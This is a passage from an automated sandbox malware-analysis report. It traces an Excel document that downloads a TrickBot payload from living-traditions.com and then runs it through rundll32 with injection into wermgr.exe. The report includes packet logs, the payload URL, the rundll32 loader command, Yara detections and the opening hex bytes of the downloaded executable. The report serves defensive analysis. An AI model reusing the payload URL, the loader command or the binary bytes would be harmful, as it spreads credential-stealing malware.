                            Apr 12, 2021 17:06:03.020081997 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.020129919 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.020133018 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.020179987 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.020183086 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.020230055 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.021414995 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.151037931 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.151130915 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.151190996 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.151252031 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.151314020 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.151315928 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.151334047 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.151384115 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.151417971 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.151444912 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.151499987 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.151503086 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.151504993 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.151562929 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.151592970 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.151622057 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.151678085 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.151679993 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.151684046 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.151738882 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.151772976 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.151808023 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.151871920 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.151876926 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.151878119 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.151936054 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.151964903 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.151994944 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.152051926 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.152054071 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.152057886 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.152112007 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.152141094 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.152170897 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.152226925 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.152228117 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.152230978 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.152295113 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.152333975 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.152365923 CEST804916564.207.186.30192.168.2.22

                            UDP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Apr 12, 2021 17:06:02.484072924 CEST5219753192.168.2.228.8.8.8
                            Apr 12, 2021 17:06:02.546745062 CEST53521978.8.8.8192.168.2.22

                            DNS Queries

                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                            Apr 12, 2021 17:06:02.484072924 CEST192.168.2.228.8.8.80xed69Standard query (0)living-traditions.comA (IP address)IN (0x0001)

                            DNS Answers

                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                            Apr 12, 2021 17:06:02.546745062 CEST8.8.8.8192.168.2.220xed69No error (0)living-traditions.com64.207.186.30A (IP address)IN (0x0001)

                            HTTP Request Dependency Graph

                            • living-traditions.com

                            HTTP Packets

                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            0192.168.2.224916564.207.186.3080C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            TimestampkBytes transferredDirectionData
                            Apr 12, 2021 17:06:02.699388027 CEST0OUTGET /blogs/click.php HTTP/1.1
                            Accept: */*
                            UA-CPU: AMD64
                            Accept-Encoding: gzip, deflate
                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                            Host: living-traditions.com
                            Connection: Keep-Alive
                            Apr 12, 2021 17:06:02.888154984 CEST2INHTTP/1.1 200 OK
                            Server: nginx
                            Date: Mon, 12 Apr 2021 15:06:02 GMT
                            Content-Type: application/octet-stream
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            X-Powered-By: PHP/7.3.25
                            Content-Disposition: attachment; filename="4HeVw.perclick"
                            X-Powered-By: PleskLin
                            Data Raw: 31 66 32 37 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 31 50 e9 4c 75 31 87 1f 75 31 87 1f 75 31 87 1f 3f 54 82 1e 74 31 87 1f 06 53 86 1e 72 31 87 1f 75 31 86 1f 70 31 87 1f 65 57 82 1e 71 31 87 1f 65 57 87 1e 74 31 87 1f 65 57 85 1e 74 31 87 1f 52 69 63 68 75 31 87 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 9a 2b 74 60 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 0d 00 28 00 00 00 b0 06 00 00 00 00 00 6d 19 00 00 00 10 00 00 00 40 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 07 00 00 04 00 00 28 0f 07 00 01 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 40 00 00 44 00 00 00 68 41 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 07 00 80 00 00 00 20 40 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 af 26 00 00 00 10 00 00 00 28 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 44 02 00 00 00 40 00 00 00 04 00 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 40 00 00 00 50 00 00 00 42 00 00 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 ff 67 06 00 00 a0 00 00 00 68 06 00 00 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 80 00 00 00 00 10 07 00 00 02 00 00 00 da 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 81 ec 28 02 00 00 53 56 be c3 68 13 00 33 db 43 83 3d 1c 90 00 10 00 89 5d d8 66 0f 6e c6 f3 0f
                            Data Ascii: 1f27MZ@!L!This program cannot be run in DOS mode.$1PLu1u1u1?Tt1Sr1u1p1eWq1eWt1eWt1Richu1PEL+t`!(m@ (@@@DhAP @@ .text&( `.rdataD@,@@.data8@PB0@.pdataghr@.reloc@BU(SVh3C=]fn


                            Code Manipulations

                            Statistics

                            Behavior

                            Click to jump to process

                            System Behavior

                            Analysis Process: EXCEL.EXE PID: 2056 Parent PID: 584

                            General

                            Start time:17:05:35
                            Start date:12/04/2021
                            Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            Wow64 process (32bit):false
                            Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                            Imagebase:0x13f7e0000
                            File size:27641504 bytes
                            MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Analysis Process: rundll32.exe PID: 2564 Parent PID: 2056

                            General

                            Start time:17:05:40
                            Start date:12/04/2021
                            Path:C:\Windows\System32\rundll32.exe
                            Wow64 process (32bit):false
                            Commandline:rundll32 ..\fdinmd.fii,StartW
                            Imagebase:0xff700000
                            File size:45568 bytes
                            MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Analysis Process: rundll32.exe PID: 2588 Parent PID: 2564

                            General

                            Start time:17:05:40
                            Start date:12/04/2021
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32 ..\fdinmd.fii,StartW
                            Imagebase:0x940000
                            File size:44544 bytes
                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000002.2089168736.0000000000650000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000002.2089228876.00000000007C0000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000002.2089212647.0000000000780000.00000040.00000001.sdmp, Author: Joe Security
                            Reputation:high

                            Analysis Process: wermgr.exe PID: 2604 Parent PID: 2588

                            General

                            Start time:17:05:41
                            Start date:12/04/2021
                            Path:C:\Windows\System32\wermgr.exe
                            Wow64 process (32bit):
                            Commandline:C:\Windows\system32\wermgr.exe
                            Imagebase:
                            File size:50688 bytes
                            MD5 hash:41DF7355A5A907E2C1D7804EC028965D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate

                            Disassembly

                            Code Analysis

                            Reset < >